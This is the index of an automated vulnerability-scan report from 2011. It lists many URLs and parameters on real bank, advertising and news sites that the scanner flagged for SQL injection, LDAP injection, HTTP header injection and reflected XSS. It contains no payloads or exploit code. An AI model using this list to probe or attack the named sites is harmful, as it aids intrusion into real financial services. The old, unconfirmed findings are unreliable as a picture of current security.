XSS, SQL Injection, Cross Site Scripting, CWE-79, CWE-89, CWE-113, HTTP Heaqder Injection, DORK

The Daily DORK Report for Feb. 3, 2011 | CloudScan Vulnerability Crawler

Report generated by CloudScan Vulnerability Crawler at Sun Feb 06 13:24:53 CST 2011.

DORK CWE-79 XSS Report

Loading

1. SQL injection

1.1. http://a.dlqm.net/adscgen/log_ut_err.php [REST URL parameter 2]

1.2. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [name of an arbitrarily supplied request parameter]

1.3. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [name of an arbitrarily supplied request parameter]

1.4. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [sig parameter]

1.5. http://getcheckingaccountonline.com/ [Referer HTTP header]

1.6. http://getcheckingaccountonline.com/ [User-Agent HTTP header]

1.7. http://getcheckingaccountonline.com/click.php [User-Agent HTTP header]

1.8. http://getcheckingaccountsonlines.info/ [Referer HTTP header]

1.9. http://getcheckingaccountsonlines.info/ [User-Agent HTTP header]

1.10. http://getcheckingaccountsonlines.info/click.php [User-Agent HTTP header]

1.11. http://googleads.g.doubleclick.net/apps/domainpark/domainpark.cgi [ref parameter]

1.12. http://googleads.g.doubleclick.net/pagead/ads [num_ads parameter]

1.13. http://onlinecheckingservice.info/ [Referer HTTP header]

1.14. http://onlinecheckingservice.info/ [User-Agent HTTP header]

1.15. http://onlinecheckingservice.info/click.php [User-Agent HTTP header]

1.16. http://onlinecheckingservices.com/ [Referer HTTP header]

1.17. http://onlinecheckingservices.com/ [User-Agent HTTP header]

1.18. http://onlinecheckingservices.com/click.php [User-Agent HTTP header]

1.19. http://s1.srtk.net/www/delivery/rd.php [trackerid parameter]

1.20. http://urlwww--feedzilla--com.rtrk.com/tools/hcc.asp [RlocalTiming cookie]

1.21. http://www.bbt.com/bbt/ [REST URL parameter 1]

1.22. http://www.bbt.com/bbt/Business/Products/ [REST URL parameter 1]

1.23. http://www.bbt.com/bbt/Business/Products/ [REST URL parameter 2]

1.24. http://www.bbt.com/bbt/Business/Products/ [REST URL parameter 3]

1.25. http://www.bbt.com/bbt/Financial-Education/default.html [REST URL parameter 1]

1.26. http://www.bbt.com/bbt/Financial-Education/default.html [REST URL parameter 2]

1.27. http://www.bbt.com/bbt/Financial-Education/default.html [REST URL parameter 3]

1.28. http://www.bbt.com/bbt/Personal/Products/ [REST URL parameter 1]

1.29. http://www.bbt.com/bbt/Personal/Products/ [REST URL parameter 2]

1.30. http://www.bbt.com/bbt/Personal/Products/ [REST URL parameter 3]

1.31. http://www.bbt.com/bbt/about/ [REST URL parameter 1]

1.32. http://www.bbt.com/bbt/about/ [REST URL parameter 2]

1.33. http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html [REST URL parameter 1]

1.34. http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html [REST URL parameter 2]

1.35. http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html [REST URL parameter 3]

1.36. http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html [REST URL parameter 4]

1.37. http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html [REST URL parameter 5]

1.38. http://www.bbt.com/bbt/about/privacyandsecurity/onlinebankinglogin.html [REST URL parameter 1]

1.39. http://www.bbt.com/bbt/about/privacyandsecurity/onlinebankinglogin.html [REST URL parameter 2]

1.40. http://www.bbt.com/bbt/about/privacyandsecurity/onlinebankinglogin.html [REST URL parameter 3]

1.41. http://www.bbt.com/bbt/about/privacyandsecurity/onlinebankinglogin.html [REST URL parameter 4]

1.42. http://www.bbt.com/bbt/careers/ [REST URL parameter 1]

1.43. http://www.bbt.com/bbt/careers/ [REST URL parameter 2]

1.44. http://www.bbt.com/bbt/contactus.html [REST URL parameter 1]

1.45. http://www.bbt.com/bbt/contactus.html [REST URL parameter 2]

1.46. http://www.bbt.com/bbt/css/topNav.css [REST URL parameter 1]

1.47. http://www.bbt.com/bbt/css/topNav.css [REST URL parameter 2]

1.48. http://www.bbt.com/bbt/css/topNav.css [REST URL parameter 3]

1.49. http://www.bbt.com/bbt/customerservice/default.html [REST URL parameter 1]

1.50. http://www.bbt.com/bbt/customerservice/default.html [REST URL parameter 2]

1.51. http://www.bbt.com/bbt/customerservice/default.html [REST URL parameter 3]

1.52. http://www.bbt.com/bbt/default.html [REST URL parameter 1]

1.53. http://www.bbt.com/bbt/default.html [REST URL parameter 2]

1.54. http://www.bbt.com/bbt/includes/chat/mtagconfig.js [REST URL parameter 1]

1.55. http://www.bbt.com/bbt/includes/chat/mtagconfig.js [REST URL parameter 2]

1.56. http://www.bbt.com/bbt/includes/chat/mtagconfig.js [REST URL parameter 3]

1.57. http://www.bbt.com/bbt/includes/chat/mtagconfig.js [REST URL parameter 4]

1.58. http://www.bbt.com/bbt/includes/javascript/AC_RunActiveContent.js [REST URL parameter 1]

1.59. http://www.bbt.com/bbt/includes/javascript/AC_RunActiveContent.js [REST URL parameter 2]

1.60. http://www.bbt.com/bbt/includes/javascript/AC_RunActiveContent.js [REST URL parameter 3]

1.61. http://www.bbt.com/bbt/includes/javascript/AC_RunActiveContent.js [REST URL parameter 4]

1.62. http://www.bbt.com/bbt/includes/javascript/browserDetect.js [REST URL parameter 1]

1.63. http://www.bbt.com/bbt/includes/javascript/browserDetect.js [REST URL parameter 2]

1.64. http://www.bbt.com/bbt/includes/javascript/browserDetect.js [REST URL parameter 3]

1.65. http://www.bbt.com/bbt/includes/javascript/browserDetect.js [REST URL parameter 4]

1.66. http://www.bbt.com/bbt/includes/javascript/new_window.js [REST URL parameter 1]

1.67. http://www.bbt.com/bbt/includes/javascript/new_window.js [REST URL parameter 2]

1.68. http://www.bbt.com/bbt/includes/javascript/new_window.js [REST URL parameter 3]

1.69. http://www.bbt.com/bbt/includes/javascript/new_window.js [REST URL parameter 4]

1.70. http://www.bbt.com/bbt/includes/javascript/swapimage.js [REST URL parameter 1]

1.71. http://www.bbt.com/bbt/includes/javascript/swapimage.js [REST URL parameter 2]

1.72. http://www.bbt.com/bbt/includes/javascript/swapimage.js [REST URL parameter 3]

1.73. http://www.bbt.com/bbt/includes/javascript/swapimage.js [REST URL parameter 4]

1.74. http://www.bbt.com/bbt/locator/default.html [REST URL parameter 1]

1.75. http://www.bbt.com/bbt/locator/default.html [REST URL parameter 2]

1.76. http://www.bbt.com/bbt/locator/default.html [REST URL parameter 3]

1.77. http://www.bbt.com/bbt/mobile/mobile-product.html [REST URL parameter 1]

1.78. http://www.bbt.com/bbt/mobile/mobile-product.html [REST URL parameter 2]

1.79. http://www.bbt.com/bbt/mobile/mobile-product.html [REST URL parameter 3]

1.80. http://www.bbt.com/bbt/personal/products/checkcard/default.html [REST URL parameter 1]

1.81. http://www.bbt.com/bbt/personal/products/checkcard/default.html [REST URL parameter 2]

1.82. http://www.bbt.com/bbt/personal/products/checkcard/default.html [REST URL parameter 3]

1.83. http://www.bbt.com/bbt/personal/products/checkcard/default.html [REST URL parameter 4]

1.84. http://www.bbt.com/bbt/personal/products/checkcard/default.html [REST URL parameter 5]

1.85. http://www.bbt.com/bbt/personal/products/onlinebanking/default.html [REST URL parameter 1]

1.86. http://www.bbt.com/bbt/personal/products/onlinebanking/default.html [REST URL parameter 2]

1.87. http://www.bbt.com/bbt/personal/products/onlinebanking/default.html [REST URL parameter 3]

1.88. http://www.bbt.com/bbt/personal/products/onlinebanking/default.html [REST URL parameter 4]

1.89. http://www.bbt.com/bbt/personal/products/onlinebanking/default.html [REST URL parameter 5]

1.90. http://www.bbt.com/bbt/sitemap.html [REST URL parameter 1]

1.91. http://www.bbt.com/bbt/sitemap.html [REST URL parameter 2]

1.92. http://www.citizensbank.com/everyday-points/default.aspx [Referer HTTP header]

1.93. http://www.regions.com/about_regions/careers.rf [REST URL parameter 1]

1.94. http://www.regions.com/about_regions/faqs.rf [REST URL parameter 1]

1.95. http://www.regions.com/about_regions/privacy_security.rf [REST URL parameter 1]

1.96. http://www.regions.com/about_regions/terms_conditions.rf [REST URL parameter 1]

1.97. http://www.regions.com/commercial_banking/tms_disbursing_funds.rf [REST URL parameter 1]

1.98. http://www.regions.com/demos/overview.rf [REST URL parameter 1]

1.99. http://www.regions.com/faq/javascript.rf [REST URL parameter 1]

1.100. http://www.regions.com/personal_banking/alternative_education_loans.rf [REST URL parameter 1]

1.101. http://www.regions.com/personal_banking/ehl.rf [REST URL parameter 1]

1.102. http://www.regions.com/personal_banking/get_started_online_statements.rf [REST URL parameter 1]

1.103. http://www.regions.com/personal_banking/online_banking_help.rf [REST URL parameter 1]

1.104. http://www.regions.com/personal_banking/online_statements.rf [REST URL parameter 1]

1.105. http://www.regions.com/personal_banking/open_account.rf [REST URL parameter 1]

1.106. http://www.regions.com/personal_banking/regionsnet.rf [REST URL parameter 1]

1.107. http://www.regions.com/personal_banking/regionsnet_bill_pay.rf [REST URL parameter 1]

1.108. http://www.regions.com/promotion/black_history.rf [REST URL parameter 1]

1.109. http://www.regions.com/promotion/loans.rf [REST URL parameter 1]

1.110. http://www.regions.com/small_business/regionsnet_business.rf [REST URL parameter 1]

1.111. http://www.regions.com/system/unsupportedbrowser.rf [REST URL parameter 1]

1.112. https://www.regions.com/FAQ/insured_deposits.rf [REST URL parameter 1]

1.113. https://www.regions.com/about_regions/economic_update.rf [REST URL parameter 1]

1.114. https://www.regions.com/personal_banking/alternative_education_loans.rf [REST URL parameter 1]

1.115. https://www.regions.com/personal_banking/auto_loans.rf [REST URL parameter 1]

1.116. https://www.regions.com/personal_banking/cds.rf [REST URL parameter 1]

1.117. https://www.regions.com/personal_banking/checking.rf [REST URL parameter 1]

1.118. https://www.regions.com/personal_banking/credit_cards.rf [REST URL parameter 1]

1.119. https://www.regions.com/personal_banking/ehl.rf [REST URL parameter 1]

1.120. https://www.regions.com/personal_banking/email_starting_net.rf [REST URL parameter 1]

1.121. https://www.regions.com/personal_banking/everyday_banking.rf [REST URL parameter 1]

1.122. https://www.regions.com/personal_banking/get_started_online_statements.rf [REST URL parameter 1]

1.123. https://www.regions.com/personal_banking/home_equity_main.rf [REST URL parameter 1]

1.124. https://www.regions.com/personal_banking/insurance.rf [REST URL parameter 1]

1.125. https://www.regions.com/personal_banking/investing.rf [REST URL parameter 1]

1.126. https://www.regions.com/personal_banking/loan_payment_hardship.rf [REST URL parameter 1]

1.127. https://www.regions.com/personal_banking/loans_credit.rf [REST URL parameter 1]

1.128. https://www.regions.com/personal_banking/mobile_banking.rf [REST URL parameter 1]

1.129. https://www.regions.com/personal_banking/money_market_main.rf [REST URL parameter 1]

1.130. https://www.regions.com/personal_banking/morgan_keegan.rf [REST URL parameter 1]

1.131. https://www.regions.com/personal_banking/open_account.rf [REST URL parameter 1]

1.132. https://www.regions.com/personal_banking/platinum_visa_check.rf [REST URL parameter 1]

1.133. https://www.regions.com/personal_banking/private_client.rf [REST URL parameter 1]

1.134. https://www.regions.com/personal_banking/regionsnet.rf [REST URL parameter 1]

1.135. https://www.regions.com/personal_banking/regionsnet_bill_pay.rf [REST URL parameter 1]

1.136. https://www.regions.com/personal_banking/retirement_planning.rf [REST URL parameter 1]

1.137. https://www.regions.com/personal_banking/savings_cds.rf [REST URL parameter 1]

1.138. https://www.regions.com/personal_banking/trust_asset.rf [REST URL parameter 1]

1.139. https://www.regions.com/system/gateway.rf [REST URL parameter 1]

1.140. https://www.suntrust.com/portal/server.pt/community/checking_account_selector/440 [REST URL parameter 4]

2. LDAP injection

2.1. http://www.local.com/ [anonId cookie]

2.2. http://www.thestreet.com/story/10991463/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html [REST URL parameter 2]

2.3. https://www.wellsfargo.com/insurance/property/home/buying [ISD_WCM_COOKIE cookie]

2.4. https://www.wellsfargo.com/mobile/onaphone/ [ISD_WCM_COOKIE cookie]

2.5. https://www.wellsfargo.com/mortgage/articles/rewards [ISD_WCM_COOKIE cookie]

2.6. https://www.wellsfargo.com/wfonline/deposit_details [ISD_WCM_COOKIE cookie]

3. HTTP header injection

3.1. http://102.xg4ken.com/media/redir.php [client parameter]

3.2. http://102.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

3.3. http://18.xg4ken.com/media/redir.php [url[] parameter]

3.4. http://ad.br.doubleclick.net/getcamphist [src parameter]

3.5. http://ad.doubleclick.net/ad/N3867.605.ACCUWEATHER/B5097428.13 [REST URL parameter 1]

3.6. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.12 [REST URL parameter 1]

3.7. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.13 [REST URL parameter 1]

3.8. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.14 [REST URL parameter 1]

3.9. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.15 [REST URL parameter 1]

3.10. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.6 [REST URL parameter 1]

3.11. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.67 [REST URL parameter 1]

3.12. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.7 [REST URL parameter 1]

3.13. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.71 [REST URL parameter 1]

3.14. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.73 [REST URL parameter 1]

3.15. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.74 [REST URL parameter 1]

3.16. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [REST URL parameter 1]

3.17. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4 [REST URL parameter 1]

3.18. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [REST URL parameter 1]

3.19. http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage [REST URL parameter 1]

3.20. http://ad.doubleclick.net/adj/N3285.google/B2343920.135 [REST URL parameter 1]

3.21. http://ad.doubleclick.net/adj/N553.158901.DATAXU/B4970757.4 [REST URL parameter 1]

3.22. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [REST URL parameter 1]

3.23. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [REST URL parameter 1]

3.24. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [REST URL parameter 1]

3.25. http://ad.doubleclick.net/adj/accuwx.us.radarandmaps/satellite [REST URL parameter 1]

3.26. http://ad.doubleclick.net/adj/locm.pp [REST URL parameter 1]

3.27. http://ad.doubleclick.net/adj/locm.sp [REST URL parameter 1]

3.28. http://ad.doubleclick.net/adj/locm.sp/retail_banks_15020100 [REST URL parameter 1]

3.29. http://ad.doubleclick.net/adj/ocr.sant.ocregister/homepage [REST URL parameter 1]

3.30. http://ad.doubleclick.net/jump/N3867.605.ACCUWEATHER/B5097428.13 [REST URL parameter 1]

3.31. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.13 [REST URL parameter 1]

3.32. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.14 [REST URL parameter 1]

3.33. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.6 [REST URL parameter 1]

3.34. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.67 [REST URL parameter 1]

3.35. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.7 [REST URL parameter 1]

3.36. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.71 [REST URL parameter 1]

3.37. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.72 [REST URL parameter 1]

3.38. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.73 [REST URL parameter 1]

3.39. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.74 [REST URL parameter 1]

3.40. http://ad.doubleclick.net/jump/locm.pp [REST URL parameter 1]

3.41. http://ad.doubleclick.net/jump/locm.sp [REST URL parameter 1]

3.42. http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100 [REST URL parameter 1]

3.43. https://ad.doubleclick.net/activity [name of an arbitrarily supplied request parameter]

3.44. https://ad.doubleclick.net/activity [src parameter]

3.45. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]

3.46. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]

3.47. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

3.48. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

3.49. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

3.50. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

3.51. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

3.52. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter]

3.53. https://customercare.suntrust.com/guides/bus_services.asp [REST URL parameter 1]

3.54. https://customercare.suntrust.com/guides/contact_us.asp [REST URL parameter 1]

3.55. https://customercare.suntrust.com/guides/credit_cards.asp [REST URL parameter 1]

3.56. https://customercare.suntrust.com/guides/deposits.asp [REST URL parameter 1]

3.57. https://customercare.suntrust.com/guides/marine_lending.asp [REST URL parameter 1]

3.58. https://customercare.suntrust.com/guides/merchant_services.asp [REST URL parameter 1]

3.59. https://customercare.suntrust.com/guides/mort_services.asp [REST URL parameter 1]

3.60. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

3.61. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

3.62. http://www.supermedia.com/business-listings/business-profile [&tsrc parameter]

3.63. http://www.supermedia.com/spportal/spportalFlow.do [REST URL parameter 2]

4. Cross-site scripting (reflected)

4.1. http://ad.adnetinteractive.com/st [name of an arbitrarily supplied request parameter]

4.2. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [adurl parameter]

4.3. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [ai parameter]

4.4. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [client parameter]

4.5. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [num parameter]

4.6. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [sig parameter]

4.7. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [sz parameter]

4.8. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [adurl parameter]

4.9. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [ai parameter]

4.10. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [client parameter]

4.11. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [num parameter]

4.12. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [sig parameter]

4.13. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [sz parameter]

4.14. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [adurl parameter]

4.15. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [adurl parameter]

4.16. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [ai parameter]

4.17. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [ai parameter]

4.18. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [client parameter]

4.19. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [client parameter]

4.20. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [num parameter]

4.21. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [num parameter]

4.22. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [sig parameter]

4.23. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [sig parameter]

4.24. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [sz parameter]

4.25. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [sz parameter]

4.26. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [adurl parameter]

4.27. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [adurl parameter]

4.28. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [ai parameter]

4.29. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [ai parameter]

4.30. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [client parameter]

4.31. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [client parameter]

4.32. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [num parameter]

4.33. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [num parameter]

4.34. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [sig parameter]

4.35. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [sig parameter]

4.36. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [sz parameter]

4.37. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [sz parameter]

4.38. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [adurl parameter]

4.39. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [adurl parameter]

4.40. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [ai parameter]

4.41. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [ai parameter]

4.42. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [client parameter]

4.43. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [client parameter]

4.44. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [num parameter]

4.45. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [num parameter]

4.46. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [sig parameter]

4.47. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [sig parameter]

4.48. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [sz parameter]

4.49. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [sz parameter]

4.50. http://ad.yieldmanager.com/v0/admeld-match [admeld_callback parameter]

4.51. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]

4.52. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]

4.53. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

4.54. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

4.55. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

4.56. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

4.57. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

4.58. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

4.59. http://ads.roiserver.com/tag.jsp [h parameter]

4.60. http://ads.roiserver.com/tag.jsp [pid parameter]

4.61. http://ads.roiserver.com/tag.jsp [w parameter]

4.62. http://ads.specificmedia.com/serve/v=5 [m parameter]

4.63. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]

4.64. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]

4.65. http://api.bing.com/qsonhs.aspx [q parameter]

4.66. http://as00.estara.com/as/InitiateCall2.php [template parameter]

4.67. http://as00.estara.com/as/commonlink.php [urid parameter]

4.68. http://as00.estara.com/as/commonlink.php [urid parameter]

4.69. http://b.scorecardresearch.com/beacon.js [c1 parameter]

4.70. http://b.scorecardresearch.com/beacon.js [c10 parameter]

4.71. http://b.scorecardresearch.com/beacon.js [c15 parameter]

4.72. http://b.scorecardresearch.com/beacon.js [c2 parameter]

4.73. http://b.scorecardresearch.com/beacon.js [c3 parameter]

4.74. http://b.scorecardresearch.com/beacon.js [c4 parameter]

4.75. http://b.scorecardresearch.com/beacon.js [c5 parameter]

4.76. http://b.scorecardresearch.com/beacon.js [c6 parameter]

4.77. http://bh.contextweb.com/bh/sync/admeld [admeld_adprovider_id parameter]

4.78. http://bh.contextweb.com/bh/sync/admeld [admeld_callback parameter]

4.79. http://business-news.thestreet.com/ocregister [name of an arbitrarily supplied request parameter]

4.80. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

4.81. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

4.82. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

4.83. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

4.84. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [name of an arbitrarily supplied request parameter]

4.85. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

4.86. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

4.87. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

4.88. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

4.89. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter]

4.90. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter]

4.91. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [name of an arbitrarily supplied request parameter]

4.92. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [q parameter]

4.93. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [q parameter]

4.94. http://citi.bridgetrack.com/cbol/10/tiered_checking/default.htm [CMP parameter]

4.95. http://common.cdn.onset.freedom.com/tools/load.php [css parameter]

4.96. http://common.cdn.onset.freedom.com/tools/load.php [name of an arbitrarily supplied request parameter]

4.97. http://common.cdn.onset.freedom.com/tools/load.php [scode parameter]

4.98. http://common.onset.freedom.com/fi/analytics/cms/ [ctype parameter]

4.99. http://common.onset.freedom.com/fi/analytics/cms/ [domain parameter]

4.100. http://common.onset.freedom.com/fi/analytics/cms/ [domain parameter]

4.101. http://common.onset.freedom.com/fi/analytics/cms/ [ghier parameter]

4.102. http://common.onset.freedom.com/tools/load.php [css parameter]

4.103. http://common.onset.freedom.com/tools/load.php [js parameter]

4.104. http://common.onset.freedom.com/tools/load.php [js parameter]

4.105. http://common.onset.freedom.com/tools/load.php [name of an arbitrarily supplied request parameter]

4.106. http://common.onset.freedom.com/tools/load.php [name of an arbitrarily supplied request parameter]

4.107. http://common.onset.freedom.com/tools/load.php [scode parameter]

4.108. http://common.onset.freedom.com/tools/load.php [scode parameter]

4.109. http://da.newstogram.com/hg.php [callback parameter]

4.110. http://da.newstogram.com/hg.php [name of an arbitrarily supplied request parameter]

4.111. http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania [REST URL parameter 3]

4.112. http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania [REST URL parameter 4]

4.113. http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania [name of an arbitrarily supplied request parameter]

4.114. http://ds.addthis.com/red/psi/sites/mapserver.superpages.com/p.json [callback parameter]

4.115. http://easycheckingbanking.com/ [keyword parameter]

4.116. http://easycheckingbanking.com/ [name of an arbitrarily supplied request parameter]

4.117. http://economy.ocregister.com/2011/02/03/o-c-in-top-three-for-job-growth/48434/ [REST URL parameter 5]

4.118. http://economy.ocregister.com/2011/02/03/o-c-in-top-three-for-job-growth/48434/ [name of an arbitrarily supplied request parameter]

4.119. http://events.cbs6albany.com/ [name of an arbitrarily supplied request parameter]

4.120. http://events.ocregister.com/ [name of an arbitrarily supplied request parameter]

4.121. http://events.ocregister.com/json [jsonsp parameter]

4.122. http://events.ocregister.com/movies [name of an arbitrarily supplied request parameter]

4.123. http://events.ocregister.com/restaurants [name of an arbitrarily supplied request parameter]

4.124. http://events.ocregister.com/search [st_select parameter]

4.125. http://events.ocregister.com/search [st_select parameter]

4.126. http://events.ocregister.com/search [st_select parameter]

4.127. http://events.ocregister.com/search [st_select parameter]

4.128. http://events.ocregister.com/search [svt parameter]

4.129. http://events.ocregister.com/search [swhat parameter]

4.130. http://events.ocregister.com/search [swhat parameter]

4.131. http://events.ocregister.com/search [swhen parameter]

4.132. http://events.ocregister.com/search [swhere parameter]

4.133. http://events.ocregister.com/venues [name of an arbitrarily supplied request parameter]

4.134. http://events.orangecounty.com/ [name of an arbitrarily supplied request parameter]

4.135. http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/ [REST URL parameter 5]

4.136. http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/ [name of an arbitrarily supplied request parameter]

4.137. http://gsbmtg.rtrk.com/ [name of an arbitrarily supplied request parameter]

4.138. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [cid parameter]

4.139. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [cid parameter]

4.140. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [dynamic_proxy parameter]

4.141. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [dynamic_proxy parameter]

4.142. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [name of an arbitrarily supplied request parameter]

4.143. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [name of an arbitrarily supplied request parameter]

4.144. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [primary_serv parameter]

4.145. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [primary_serv parameter]

4.146. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [rl_key parameter]

4.147. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [rl_key parameter]

